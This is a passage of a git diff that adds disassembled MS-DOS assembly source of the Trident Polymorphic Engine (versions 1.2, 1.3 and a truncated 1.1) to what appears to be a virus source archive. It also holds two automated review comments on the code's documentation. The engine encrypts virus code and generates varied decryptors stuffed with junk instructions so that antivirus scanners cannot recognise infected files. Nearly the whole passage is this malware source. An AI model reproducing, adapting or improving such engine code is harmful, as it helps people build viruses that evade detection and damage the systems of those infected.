+ jnz junk6_ret + + call do_nop + mov ax,0F087 ;insert XCHG SI,reg + or ah,cl + test ch,8 + jz j6_1 + mov al,8Bh +j6_1: stosw + + call do_nop + push bx + call rnd_get + xchg ax,bx + and bx,0F7FBh ;insert XOR [SI],xxxx + or bl,8 + call do_xor + pop bx +junk6_ret: pop cx + ret + + +junk7: and al,0F ;MOV reg,xxxx + or al,0B0 + call no_sp + stosb + test al,8 + pushf + call rnd_get + popf + jmp short byte_word + + +junk8: and ah,39 ;DO r/m,r(8/16) + or al,0C0 + call no_sp + xchg al,ah + stosw + ret + + +junk9: and al,3Bh ;DO r(8/16),r/m + or al,2 + and ah,3F + call no_sp2 + call no_bp + stosw + ret + + +junkA: and ah,1 ;DO rm,xxxx + or ax,80C0 + call no_sp + xchg al,ah + stosw + test al,1 + pushf + call rnd_get + popf + jmp short byte_word + + +junkB: call nop8 ;NOP / LOOP + mov ax,0FDE2 + stosw + ret + + +junkC: and al,09 ;CMPS* or SCAS* + test ah,1 + jz mov_test + or al,0A6 + stosb + ret +mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0A8 + pushf + call rnd_get + popf + jmp short byte_word + + +junkD: and al,07 ;XCHG AX,reg + or al,90 + call no_sp + stosb + ret + + +junkE: and ah,07 ;PUSH reg / POP reg + or ah,50 + mov al,ah + or ah,08 + stosw + ret + + +junkF: and al,0F ;INC / DEC + or al,40 + call no_sp + stosb + ret + + +;**************************************************************************** +;* store a byte or a word +;**************************************************************************** + +byte_word: jz only_byte + stosw + ret + +only_byte: stosb + ret + + +;**************************************************************************** +;* don't fuck with SP! +;**************************************************************************** + +no_sp: push ax + and al,7 + cmp al,4 + pop ax + jnz no_sp_ret + and al,0FBh +no_sp_ret: ret + + +;**************************************************************************** +;* don't fuck with SP! 
+;**************************************************************************** + +no_sp2: push ax + and ah,38 + cmp ah,20 + pop ax + jnz no_sp2_ret + xor ah,20 +no_sp2_ret: ret + + +;**************************************************************************** +;* don't use [BP+..] +;**************************************************************************** + +no_bp: test ah,4 + jnz no_bp2 + and ah,0FDh + ret + +no_bp2: push ax + and ah,7 + cmp ah,6 + pop ax + jnz no_bp_ret + or ah,1 +no_bp_ret: ret + + +;**************************************************************************** +;* write byte for JMP/CALL and fill with random bullshit +;**************************************************************************** + +fill_bullshit: push cx + xchg ax,cx +bull_lup: call rnd_get + stosb + loop bull_lup + pop cx + ret + + +;**************************************************************************** +;* random number generator (stolen from 'Bomber') +;**************************************************************************** + +rnd_init: push cx + call rnd_init0 ;init + and ax,000F + inc ax + xchg ax,cx +random_lup: call rnd_get ;call random routine a few + loop random_lup ; times to 'warm up' + pop cx + ret + +rnd_init0: push dx ;initialize generator + push cx + mov ah,2C + int 21 + in al,40 + mov ah,al + in al,40 + xor ax,cx + xor dx,ax + jmp short move_rnd + +rnd_get: push dx ;calculate a random number + push cx + push bx + mov ax,0 ;will be: mov ax,xxxx + mov dx,0 ; and mov dx,xxxx + mov cx,7 +rnd_lup: shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_l2 + inc al +rnd_l2: loop rnd_lup + pop bx + +move_rnd: mov word ptr ds:[rnd_get+4],ax + mov word ptr ds:[rnd_get+7],dx + mov al,dl + pop cx + pop dx + ret + + +;**************************************************************************** +;* tables for engine +;**************************************************************************** + + ; AX AL AH (BX) BL BH CX CL CH +mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 
0B3, 0B7, 0, 0B9, 0B1, 0B5 + + ; nop clc stc cmc cli cld incbp decbp +nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh + + ; or and xchg mov +nop_data16 db 8, 20, 84, 88 + + ; bl/bh, bx, si di +dir_change db 07, 07, 04, 05 +ind_change db 03, 03, 06, 07 + + + ; xor xor add sub +how_mode db 30, 30, 00, 28 + + ; ? add xor or +add_mode db 0, 0C8, 0F0, 0C0 + +tpe_bottom equ $ + + end TPE12 diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm b/MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm new file mode 100644 index 00000000..bbded297 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm 
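Review bot: The file header documents the register contract but never states the numeric base, even though `.radix 16` on the first line makes every unsuffixed literal hexadecimal — `mov al,50` and `mov al,58` in crypt emit PUSH AX / POP AX, and `and ax,1F` masks five bits, all of which a reader assuming decimal will misparse. A header line such as `; all unsuffixed numbers in this listing are hex (.radix 16)` would remove that trap; the v1.3 and v1.1 listings in this patch have the same gap. The header should also say that rnd_get is self-modifying: move_rnd stores the generator state into the immediates at `rnd_get+4` and `rnd_get+7`, so the `mov ax,0` / `mov dx,0` seen on disk are placeholders, as the comment `;will be: mov ax,xxxx` only hints.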
@@ -0,0 +1,1009 @@ +.radix 16 + +;============================================================================= +; = +; Trident Polymorphic Engine v1.3 = +; ------------------------------- = +; = +; Dissassembled by: Lucifer Messiah -- ANARKICK SYSTEMS = +; = +; This dissassembly uses as many of the labels from the = +; TPE v1.2 dissassembly as possible, to allow comparison = +; = +;----------------------------------------------------------------------------= +; = +; Trident Polymorphic Engine v1.3 = +; ------------------------------- = +; = +; Input: = +; ES Work Segment = +; DS:DX Code to be encrypted = +; BP Becomes offset of TPE = +; SI Distance to put betwen decryptor and code = +; CX Length of code to encrypt = +; AX Bit Field Flags: bit 0: DS will not be equal to CS = +; bit 1: insert random instructions = +; bit 2: put junk before decryptor = +; bit 3: Preserve AX with decryptor = +; = +; Output: = +; ES Work segment (preserved) = +; DS:DX Decryptor + encrypted code = +; BP Start of decryptor = +; DI Length of decryuptor/offset of encrypted code = +; CX Length of decryptor + encrypted code = +; AX Length of encrypted code = +; = +;============================================================================= + +.model tiny +.code + +public rnd_init +public rnd_get +public crypt +public tpe_top +public tpe_bottom + + + org 100h + +tpe_top equ $ + db '[ MK / TridenT ]' ;Encryptor name +crypt: + push ds ;save registers + push dx + push si + push cs + pop ds + call TPE_13 + +TPE_13: + pop si + sub si,offset TPE_13 ;get delta offset + + xor di,di ;di=start of decryptor + mov byte ptr flags[si],al + test al,08 + je no_push + mov al,50h + stosb + +no_push: + call rnd_get ;add a few bytes to cx + and ax,1fh + add cx,ax + push cx ;save length of code + call rnd_get ;get random flags + xchg ax,bx + +;--- Flags: ----------------------------------------------- +; +; 0,1 encryption method +; 2,3 which registers to use in encryption engine +; 4 use byte or word for 
encrypt +; 5 MOV AL, MOV AH, or MOV AX +; 6 MOV CL, MOV CH, or MOV CX +; 7 AX or DX +; 8 count up or down +; 9 ADD/SUB/INC/DEC or CMPSW/SCASW +; A ADD/SUB or INC/DEC +; CMPSW or SCASW +; B offset in XOR instrucion? +; C LOOPNZ or LOOP +; SUB CX or DEC CX +; D carry with crypt ADD/SUB +; E carry with inc ADD/SUB +; F XOR instruction value or AX/DX +; +;---------------------------------------------------------- + +random: + call rnd_not_0 ;get encryption value + mov word ptr xor_val[si],ax ;store it + + call do_junk ;insert random instructions + pop cx + mov ax,0111h ;make flags to remember which + test bl,20h ; MOV instructions are used + jne z0 + xor al,07 + +z0: + test bl,0ch + jne z1 + xor al,70h + +z1: + test bl,40h + jne z2 + xor ah,07 + +z2: + test bl,10h + jne z3 + and al,73h + +z3: + test bh,80h + jne z4 + and al,70h + +z4: + mov dx,ax + +mov_lup: + call rnd_get ;put MOV instructions in a + and ax,000fh ; random order + cmp al,0ah + ja mov_lup + mov word ptr store_mov[si],ax ; Why???? + push cx ;test if MOV already done + xchg ax,cx + mov ax,0001h + shl ax,cl + mov cx,ax + and cx,dx + pop cx + je mov_lup + xor dx,ax ;remember which MOV done + + push dx + call do_mov ;insert MOV instruction + call do_nop ;insert a random NOP + pop dx + or dx,dx ;all MOVs done? + jne mov_lup + push di ;save start of decryptor loop + call do_add_ax ;add a value to AX in loop? + call do_nop + test bh,20h ;carry with ADD/SUB? + je no_clc + mov al,0f8h + stosb + +no_clc: + mov word ptr xor_offset[si],0000h + call do_xor ;place all loop instructions + call do_nop + call do_add + pop dx ;get start of decryptor loop + call do_loop + test byte ptr flags[si],08 ;insert POP AX?? + je no_pop + mov al,58h + stosb + +no_pop: + mov ax,di ;calculate loop offset + add ax,bp + pop dx + add ax,dx + sub ax,word ptr xor_offset[si] + push di + mov di,word ptr where_len[si] + test bl,0ch ;are BL,BH used for encryption? 
+ jne v2 + mov byte ptr es:[di],al + mov di,word ptr where_len2[si] + mov byte ptr es:[di],ah + jmp short v3 + +v2: + mov word ptr es:[di],ax + +v3: + pop di + mov dx,word ptr xor_val[si] + mov bp,word ptr add_val[si] + pop si ;ds:si=start of code + pop ds + push di ;save pointer to encrypted code + push cx ;save length of encrypted code + test bl,10h ;byte or word? + je blup + inc cx ;cx=# of crypts (words) + shr cx,1 + +lup: + lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + +blup: + lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: + mov cx,di ;cx=length decryptor + code + pop ax ;ax=length of decrypted code + pop di ;offset encrypted code + xor dx,dx ;ds:dx=decryptor + cr. code + push es + pop ds + retn + +;--- Encrypt the Code ------------------------------------- + +do_encrypt: + add dx,bp + test bl,02 + jne lup1 + xor ax,dx + retn + +lup1: + test bl,01 + jne lup2 + sub ax,dx + retn + +lup2: + add ax,dx + retn + +;--- Generate MOV reg,xxxx -------------------------------- + +do_mov: + mov dx,word ptr mov_byte[si] + push bx + mov bx,dx + mov al,byte ptr mov_here[bx+si] + + pop bx + cmp dl,04 ; bx??? + jne is_not_bx + call add_ind + +is_not_bx: + test dl,0ch ; a*? + pushf + jne is_not_a + test bl,80h ; a* or d*? + je is_not_a + add al,02 + +is_not_a: + call alter ; insert the MOV + popf ; a* + jne is_not_a2 + mov ax,word ptr xor_val[si] + jmp short sss + +is_not_a2: + test dl,08 ; b*? + jne is_not_b + push bx + lea bx,word ptr where_len[si] + test dl,02 + je is_not_bh + add bx,02 + +is_not_bh: + mov word ptr [bx],di + pop bx + jmp short sss + +is_not_b: + mov ax,cx ;c*? + test bl,10h ;byte or word encryption? + je sss + inc ax ;only half the number of bytes + shr ax,1 + +sss: + test dl,03 ;byte or word register? + je is_x + test dl,02 ;*h? 
+ je is_not_h + xchg ah,al + +is_not_h: + stosb + retn + +is_x: + stosw + retn + +;--- Insert MOV or alternative for MOV -------------------- + +alter: + push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,03 ;use alternative for MOV? + je no_alter + + push ax + and bx,0fh + and al,08 + shl ax,1 + or bx,ax + pop ax + + and al,07 + mov cl,09 + xchg ax,cx + mul cl + + add ax,30c0h + xchg ah,al + test bl,04 + je no_sub + mov al,28h +no_sub: call maybe_2 + stosw + + mov al,80h + call maybe_2 + stosb + + xchg ax,bx + and ax,0003h + lea bx,word ptr alt_code[si] + xlat ;AL = DS:[BX+AL] + add al,cl + +no_alter: stosb + pop cx + pop bx + retn + +;--- Insert ADD AX,XXXX ----------------------------------- + +do_add_ax: + push cx + mov word ptr add_val[si],0 ;save ADD value here + + mov ax,bx + and ax,8110h + xor ax,8010h + jne no_add_ax ;use ADD? + + mov ax,bx + xor ah,ah + mov cl,03 + div cl + or ah,ah + jne no_add_ax ;use ADD? + + test bl,80h + jne do_81C2 ;AX or DX? + mov al,05 + stosb + jmp short do_add0 + +do_81C2: mov ax,0c281h + stosw + +do_add0: call rnd_get + mov word ptr add_val[si],ax + stosw + +no_add_ax: pop cx + retn + +;--- generate encryption command -------------------------- + +do_xor: + test byte ptr flags[si],01 + je no_cs + mov al,2eh ;insert CS: instruction + stosb + +no_cs: test bh,80h ;type of XOR command + je xor1 + call get_xor + call do_carry + call save_it + xor ax,ax + test bl,80h + je xxxx + add al,10h + +xxxx: + call add_dir + test bh,08 + jne yyyy + stosb + retn + +yyyy: or al,80h + stosb + call rnd_get + stosw + mov word ptr xor_offset[si],ax + retn + +xor1: mov al,80h ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr xor_val[si] + test bl,10h + jmp byte_word + +;--- generate increase/decrease command ------------------- + +do_add: + test bl,08 ;no CMPSW/SCASW if BX is used + je da0 + test bh,02 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jne do_cmpsw + + +da0: test bh,04 ;ADD/SUB or 
INC/DEC? + je add1 + mov al,40h ;INC/DEC + +add0: + call add_ind + stosb + test bl,10h ;byte or word? + je return + stosb ;same instruction again + +return: retn + +add1: test bh,40h ;ADD/SUB + je no_clc2 ;carry?? + mov al,0f8h ;insert CLC + stosb + +no_clc2: mov al,83h + stosb + mov al,0c0h + test bh,40h + je add2 + and al,0cfh + or al,10h + +add2: call add_ind + stosb + mov al,01 + +save_it: + call add_1 + stosb + retn + +do_cmpsw: test bh,04 ;CMPSW or SCASW + je normal_cmpsw + test bl,04 ;no SCASW if SI is used + jne do_scasw + +normal_cmpsw: mov al,0a6h + jmp short save_it + +do_scasw: mov al,0aeh + jmp short save_it + +;--- generate LOOP command -------------------------------- + +do_loop: + test bh,01 ;no JNE if counting down + jne cx_loop + mov al,0e0h ;LOOPNZ or LOOP? + test bh,1ah ; no LOOPNZ if xor-offset + je l10 ; no LOOPNZ if CMP/SCASW + add al,02 + +l10: stosb + mov ax,dx + sub ax,di + dec ax + stosb + retn + +cx_loop: test bh,10h ;SUB CX or DEC CX?? + jne cxl_dec + mov al,83h + stosb + call rnd_get + test al,01 + jne b062c9 + mov ax,01e9h + jmp short asdfasdf + +b062c9: mov ax,0ffc1h + +asdfasdf: stosw + jmp short do_jne + +cxl_dec: mov al,49h + stosb + +do_jne: call rnd_get + test al,01 + mov al,7fh + jne l10 + mov al,75h + jmp short l10 + +;--- add value to AL depending on register type ----------- + +add_dir: + push di + lea di,word ptr dir_change[si] + jmp short xx1 + +add_ind: + push di + lea di,word ptr ind_change[si] + +xx1: push bx + shr bl,1 + shr bl,1 + and bx,03 + add al,byte ptr [bx+di] + pop bx + pop di + retn + +;--- mov encryption command byte to AL -------------------- + +get_xor: + push bx + xchg ax,bx + and ax,0003h + lea bx,word ptr how_mode[si] + xlat + pop bx + retn + +;--- change ADD to ADC ------------------------------------ + +do_carry: + test bl,02 ;ADD/SUB used for encryption? 
+ je no_ac + test bh,20h + je no_ac + and al,0cfh + or al,10h + +no_ac: retn + +;--- change AL (byte/word) -------------------------------- + +add_1: + test bl,10h + je add_1_ret + inc al + +add_1_ret: retn + +;--- change AL (byte/word) -------------------------------- + +maybe_2: + call add_1 ;can't touch this + cmp al,81h + je maybe_not + push ax + call rnd_get + test al,01 + pop ax + je maybe_not + add al,02 + +maybe_not: retn + +;--- insert random instructions --------------------------- + +do_junk: + test byte ptr flags[si],04 + je no_junk + call rnd_get ;put a random number of + and ax,000fh ; dummy instructions before + inc ax ; decryptor + xchg ax,cx +junk_loop: call junk + loop junk_loop + +no_junk: retn + +;--- Insert random nop (or not) --------------------------- + +do_nop: + test byte ptr flags[si],02 + +yes_nop: je no_nop + call rnd_get + test al,03 + je nop8 + test al,02 + je nop16 + test al,01 + je nop16x + +no_nop: retn + +;--- get rough random nop (may affect register values ----- + +junk: + call rnd_get + and ax,001eh + jmp short aa0 + +nop16x: call rnd_get + and ax,0006h + +aa0: push bx + xchg ax,bx + call rnd_get + mov bx,word ptr junk_cals[bx+si] + add bx,si + call bx + pop bx + retn + +;--- NOP and junk addresses ------------------------------- + +junk_cals: + dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + +;--- NOP and junk routines -------------------------------- + +nop16x0: + add byte ptr [si],cl ; J* 0000 (conditional) + jo yes_nop ; Jump on Overflow + retn + +nop16x1: + mov al,0ebh ; JMP xxxx / junk + and ah,07 + inc ah + stosw + xchg ah,al ;get length of bullshit + cbw ;convrt AL to AX + jmp fill_bullshit + +nop16x2: + call junkD ; XCHG AX,reg /XCHG AX,reg + stosb + retn + +nop16x3: + call 
junkF ; INC/DEC or DEC/INC + xor al,08 + stosb + retn + +nop8: + push bx + and al,07 + lea bx,word ptr nop_data8[si] + xlat ; AL = DS:[BX+AL] + stosb + pop bx + retn + +nop16: push bx + and ax,0303h + lea bx,word ptr nop_data16[si] + xlat ; AL = DS:[BX+AL] + add al,ah + stosb + call rnd_get + and al,07 + mov bl,09 + mul bl + add al,0c0h + stosb + pop bx + retn + +junk6: + push cx + mov al,0e8h ;CALL xxxx / junk / POP reg + and ah,0fh + inc ah + stosw + xor al,al + stosb + xchg ah,al + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,07 + call no_sp + mov cx,ax + or al,58h + stosb + + test ch,03 ;more? + jne junk6_ret + call do_nop + mov ax,0f087h ; insert XCHG SI,reg + or ah,cl + test ch,08 + je j6_1 + mov al,8bh + +j6_1: stosw + call do_nop + call rnd_get + xchg ax,bx + and bx,0f7fbh ;insert XOR [SI],xxxx + or bl,08 + call do_xor + +junk6_ret: pop cx + retn + +junk7: + and al,0fh ;MOV reg,xxxx + or al,0b0h + call no_sp + stosb + test al,08 + pushf + call rnd_get + popf + jmp short byte_word + +junk8: + and ah,39h ;DO r/m,r(8,16) + or al,0c0h + call no_sp + xchg ah,al + stosw + retn + +junk9: + and al,3bh ;DO r(8/16),r/m + or al,02 + and ah,3fh + test al,01 + je junk9_ret + or ah,0c0h + +junk9_ret: call no_sp2 + call no_bp + stosw + retn + +junkA: + and ah,01 ;DO rm,xxxx + or ax,80c0h + call no_sp + xchg ah,al + stosw + test al,01 + pushf + call rnd_get + popf + jmp short byte_word + +junkB: + call nop8 ;NOP/LOOP + mov ax,0fde2h + stosw + retn + +junkC: + and al,09 ;CMPS* or SCAS* + test ah,01 + je mov_test + or al,0a6h + and al,0feh + stosb + retn + +mov_test: or al,0a0h ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0a8h + pushf + call rnd_not_0 + dec ax + popf + jmp short byte_word + +junkD: + and al,07 ; XCHG AX,reg + or al,90h + call no_sp + stosb + retn + + +junkE: + and ax,0307h + or ax,5850h + stosw + retn + +junkF: + and al,0fh ; INC/DEC + or al,40h + call no_sp + stosb + retn + +;--- store a byte or a word 
------------------------------- + +byte_word: je only_byte + stosw + retn + +only_byte: stosb + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp: + push ax + and al,07 + cmp al,04 + pop ax + jne no_sp_ret + and al,0fbh + +no_sp_ret: retn + +;--- don't fuck with sp ----------------------------------- + +no_sp2: + push ax + and ah,38h + cmp ah,20h + pop ax + jne no_sp2_ret + xor ah,20h + +no_sp2_ret: retn + +;--- don't use [bp+..] ------------------------------------ + +no_bp: + test ah,04 + jne no_bp2 + and ah,0fdh + retn + +no_bp2: push ax + and ah,07 + cmp ah,06 + pop ax + jne no_bp_ret + or ah,01 + +no_bp_ret: retn + +;--- write byte for JMP/CALL and fill with random bullshit + +fill_bullshit: + push cx + xchg ax,cx + +bull_lup: call rnd_get + stosb + loop bull_lup + pop cx + retn + +;--- random number generator ------------------------------ + +rnd_init: + push ax + push cx + call rnd_init0 + and ax,000fh + inc ax + xchg ax,cx + +random_lup: call rnd_get ;call random routine a few + loop random_lup ; times to 'warm up' + + pop cx + pop ax + retn + +rnd_init0: + push dx ;initialize generator + push cx + mov ah,2ch + int 21h ; get time CH,CL:DH,DL + in al,40h ; timer + mov ah,al + in al,40h ; timer + + xor ax,cx + xor dx,ax + jmp short move_rnd + +rnd_not_0: + call rnd_get + or ax,ax + je rnd_not_0 + retn + +rnd_get: + push dx ;calculate random number + push cx + push bx + in al,40h ;timer + add ax,0000h ;ERROR: should be MOV ax,0 + mov dx,0000h + mov cx,0007h + +rnd_lup: shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_12 + inc al + +rnd_12: loop rnd_lup + pop bx + +move_rnd: push si + call mov_rnd2 + +mov_rnd2: + pop si + mov word ptr cs:[si-1Bh],ax ; [si-(rnd_get+4)] + mov word ptr cs:[si-18h],dx ; [si-(rnd_get+7)] + pop si + mov al,dl + pop cx + pop dx + retn + +;--- TABLES FOR ENGINE ------------------------------------ + +mov_byte: db 0b8,0b0,0b4,00 ;AX,AL,AH,.. + db 0b8,0b3,0b7,00 ;BX,BL,BH,.. 
+ db 0b9,0b1,0b5 ;CX,CL,CH + +nop_data8 db 90,0f8,0f9,0f5 ;NOP,CLC,STC,CMC + db 0fa,0fc,45,4dh ;CLI,CLD,INC BP,DEC BP + +nop_data16 db 8,20,84,88 ;OR,AND,XCHG,MOV + +dir_change db 7,7,4,5 ;BL/BH,BX,SI,DI + +ind_change db 3,3,6,7 ;BL/BH,BX,SI,DI + +how_mode db 30,30,0,28 ;XOR,XOR,ADD,SUB + +alt_code dw 0c0f0, 0c800 ;????, ADD AL,CL + +add_val dw 00 +xor_val dw 00 +xor_offset dw 00 +where_len dw 00 +where_len2 dw 00 +store_mov dw 00 +mov_here = $-1 +flags db 00 + +ID_Bytes db '[TPE 1.3]' +tpe_bottom equ $ + + end crypt + diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm b/MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm new file mode 100644 index 00000000..e6702ac6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm 
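Review bot: The `;ERROR: should be MOV ax,0` annotation on `add ax,0000h` in rnd_get reads as a statement of fact but is the disassembler's guess: unlike v1.2 in this same patch, this rnd_get first executes `in al,40h`, so adding the stored state to the timer byte is plausibly the author's intent, and the comment should be hedged, e.g. `; v1.2 used MOV here; with the preceding IN this may be deliberate`. The stores in mov_rnd2, `mov word ptr cs:[si-1Bh],ax` and `cs:[si-18h],dx`, patch those immediates at run time, and the fixed displacements only hold while the encoding between rnd_get and mov_rnd2 is unchanged — the `; [si-(rnd_get+4)]` comments would be clearer as an explicit invariant (`; displacement = mov_rnd2 - (rnd_get+4); any edit between them breaks it`), which also tells an analyst why the listed zeros never match the live values.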
@@ -0,0 +1,1028 @@ +.radix 16 + +;============================================================================= +; = +; Trident Polymorphic Engine v1.1 = +; ------------------------------- = +; = +; Dissassembled by: Lucifer Messiah -- ANARKICK SYSTEMS = +; = +; This dissassembly uses as many of the labels from the = +; TPE v1.2 dissassembly as possible, to allow comparison = +; = +;----------------------------------------------------------------------------= +; = +; Trident Polymorphic Engine v1.1 = +; ------------------------------- = +; = +; Input: = +; ES Work Segment = +; DS:DX Code to be encrypted = +; BP Becomes offset of TPE = +; SI Distance to put between decryptor and code = +; CX Length of code to encrypt = +; AX Bit Field Flags: bit 0: DS will not be equal to CS = +; bit 1: insert random instructions = +; bit 2: put junk before decryptor = +; bit 3: Preserve AX with decryptor = +; = +; Output: = +; ES Work Segment (preserved) = +; DS:DX Decryptor + encrypted code = +; BP Start of decryptor (preserved) = +; DI Length of decryptor/offset of encrypted code = +; CX Length of decryptor + encrypted code = +; AX Length of encrypted code = +; = +;============================================================================= + + .model tiny + .code + org 0 + +public rnd_init +public rnd_get +public crypt +public tpe_top +public tpe_bottom + +tpe_top equ $ + db '[ MK / TridenT ]' ;encryptor name + +crypt: + xor di,di + call dword ptr ds:[5652h] ;???? 
+ push cs ;save registers + pop ds + mov byte ptr flags,al + test al,8 + je no_push + mov al,50h + stosb + +no_push: + call rnd_get ;add a few bytes to cx + and ax,1fh + add cx,ax + push cx ;save length of code + call rnd_get ;get random flags + xchg ax,bx + +;--- Flags: ----------------------------------------------- +; +; 0,1 encryption method +; 2,3 which registers to use in encryption engine +; 4 use byte or word for encrypt +; 5 MOV AL, MOV AH, or MOV AX +; 6 MOV CL, MOV CH, or MOV CX +; 7 AX or DX +; 8 count up or down +; 9 ADD/SUB/INC/DEC or CMPSW/SCASW +; A ADD/SUB or INC/DEC +; CMPSW or SCASW +; B offset in XOR instrucion? +; C LOOPNZ or LOOP +; SUB CX or DEC CX +; D carry with crypt ADD/SUB +; E carry with inc ADD/SUB +; F XOR instruction value or AX/DX +; +;---------------------------------------------------------- + +random: + call rnd_get ;get encryption value + or al,al ;is it a 0? + je random ;redo it if it is + mov word ptr xor_val,ax ;store non-zero encryptor + call do_junk ;insert random instructions + pop cx + mov ax,0111h ;make flags to remember which + test bl,20h ; MOV instructions are used + jne z0 + xor al,07 + +z0: + test bl,0ch + jne z1 + xor al,70h + +z1: + test bl,40h + jne z2 + xor ah,7 + +z2: + test bl,10h + jne z3 + and al,73h + +z3: + test bh,80h + jne z4 + and al,70h + +z4: + mov dx,ax + +mov_lup: + call rnd_get ;put MOV instrucions in a + and ax,0fh ; random order + cmp al,0ah + ja mov_lup + mov si,ax ; + push cx ;test if MOV already done + xchg ax,cx + mov ax,1 + shl ax,cl + mov cx,ax + and cx,dx + pop cx + je mov_lup + xor dx,ax ;remember which MOV done + push dx + call do_mov + call do_nop ;insert a random NOP + pop dx + or dx,dx ;all MOVs done? + jne mov_lup + push di ;save start of decryptor loop + call do_add_ax ;ADD AX for loop + call do_nop + test bh,20h ;carry with ADD/SUB? 
+ je no_clc + mov al,0f8h + stosb + +no_clc: + mov word ptr xor_offset,0 + call do_xor ;place all loop instructions + call do_nop + call do_add + pop dx ;get start of decryptor loop + call do_loop + test byte ptr store_mov,8 ;insert POP AX? + je no_pop + mov al,58h + stosb + +no_pop: + xor ax,ax + test bh,01 + je no_pop2 + mov ax,cx + dec ax + test bl,10h + je no_pop2 + and al,0feh + +no_pop2: + add ax,di ;calculate loop offset + add ax,bp + pop si + add ax,si + sub ax,word ptr xor_offset + mov si,word ptr where_len + test bl,0ch ;are BL,BH used for encryption? + jne v2 + mov byte ptr es:[si],al + mov si,word ptr where_len2 + mov byte ptr es:[si],ah + jmp short v3 + +v2: + mov word ptr es:[si],ax + +v3: + mov dx,word ptr xor_val + pop si ;ds:si=start of code + pop ds + push di ;save pointer to start of code + push cx ; and length of encrypted code + test bl,10h ;byte or word? + je blup + inc cx ;cx=# of crypts (words) + shr cx,1 + +lup: + lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + +blup: + lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: + mov cx,di ;cx=lenth decryptor + code + pop ax ;ax=length of decrypted code + pop di ;offset encrypted code + xor dx,dx ;ds:dx=decryptor + cr code + push es + pop ds + retn + +;--- Encrypt the Code ------------------------------------- + +do_encrypt: + add dx,word ptr cs:add_val + test bl,02 + jne lup1 + xor ax,dx + retn + +lup1: + test bl,01 + jne lup2 + sub ax,dx + retn + +lup2: + add ax,dx + retn + +;--- Generate MOV reg,xxxx -------------------------------- + +do_mov: + mov dx,si + mov al,byte ptr ds:mov_byte[si] + cmp dl,04 ;bx? + jne is_not_bx + call add_ind + +is_not_bx: + test dl,0ch ;a*? + pushf + jne is_not_a + test bl,80h ;a* or d*? + je is_not_a + add al,02 + +is_not_a: + call alter ;insert the MOV A* + popf + jne is_not_a2 + mov ax,word ptr ds:xor_val + jmp short sss + +is_not_a2: + test dl,08 ;b*? 
+ jne is_not_b + mov si,offset where_len + test dl,2 + je is_not_bh + add si,2 + +is_not_bh: + mov word ptr [si],di + jmp short sss + +is_not_b: + mov ax,cx ;c*? + test bl,10h ;byte or word encrypt? + je sss + inc ax ;only 1/2 the number of bytes + shr ax,1 + +sss: + test dl,3 ;byte or word register? + je is_x + test dl,2 ;*h? + je is_not_h + xchg ah,al + +is_not_h: + stosb + retn + +is_x: + stosw + retn + +;--- Insert MOV or alternative for MOV -------------------- + +alter: + push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,3 ;use alternative for MOV? + je no_alter + push ax + and bx,0fh + and al,8 + shl ax,1 + or bx,ax + pop ax + and al,7 + mov cl,9 + xchg ax,cx + mul cl + add ax,30c0h + xchg ah,al + test bl,4 + je no_sub + mov al,28h + +no_sub: + call maybe_2 + stosw + mov al,80h + call maybe_2 + stosb + lea ax,word ptr alt_code + xchg ax,bx + and ax,3 + xlat + add al,cl + +no_alter: + stosb + pop cx + pop bx + retn + +;--- Insert ADD AX,xxxx ----------------------------------- + +do_add_ax: + push cx + lea si,add_val + mov word ptr [si],0 ;save ADD val + mov ax,bx + and ax,8110h + xor ax,8010h + jne no_add_ax ;use ADD? + mov ax,bx + xor ah,ah + mov cl,3 + div cl + or ah,ah + jne no_add_ax ;use ADD? + test bl,80h + jne do_81C2 ;AX or DX? 
+ mov al,5 + stosb + jmp short do_add0 + +do_81C2: + mov ax,0c281h + stosw + +do_add0: + call rnd_get + mov word ptr [si],ax + stosw + +no_add_ax: + pop cx + retn + +;--- generate encryption command -------------------------- + +do_xor: + test byte ptr ds:flags,1 + je no_cs + mov al,2eh ;insert CS: instruction + stosb + +no_cs: + test bh,80h ;type of XOR command + je xor1 + call get_xor + call do_carry + call save_it + xor ax,ax + test bl,80h + je xxxx + add al,10h + +xxxx: + call add_dir + test bh,8 + jne yyyy + stosb + retn + +yyyy: + or al,80h + stosb + call rnd_get + stosw + mov word ptr ds:xor_offset,ax + retn + +xor1: + mov al,80h ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr ds:xor_val + test bl,10h + jmp byte_word + +;--- generate increase/decrease command ------------------- + +do_add: + test bl,8 ;no CMPSW/SCASW if BX is used + je da0 + test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jne do_cmpsw + +da0: + test bh,4 ;ADD/SUB or INC/DEC? + je add1 + mov al,40h ;INC/DEC + test bh,01 + je add0 + add al,8 + +add0: + call add_ind + stosb + test bl,10h + je return + stosb + +return: + retn + +add1: + test bh,40h ;ADD/SUB + je 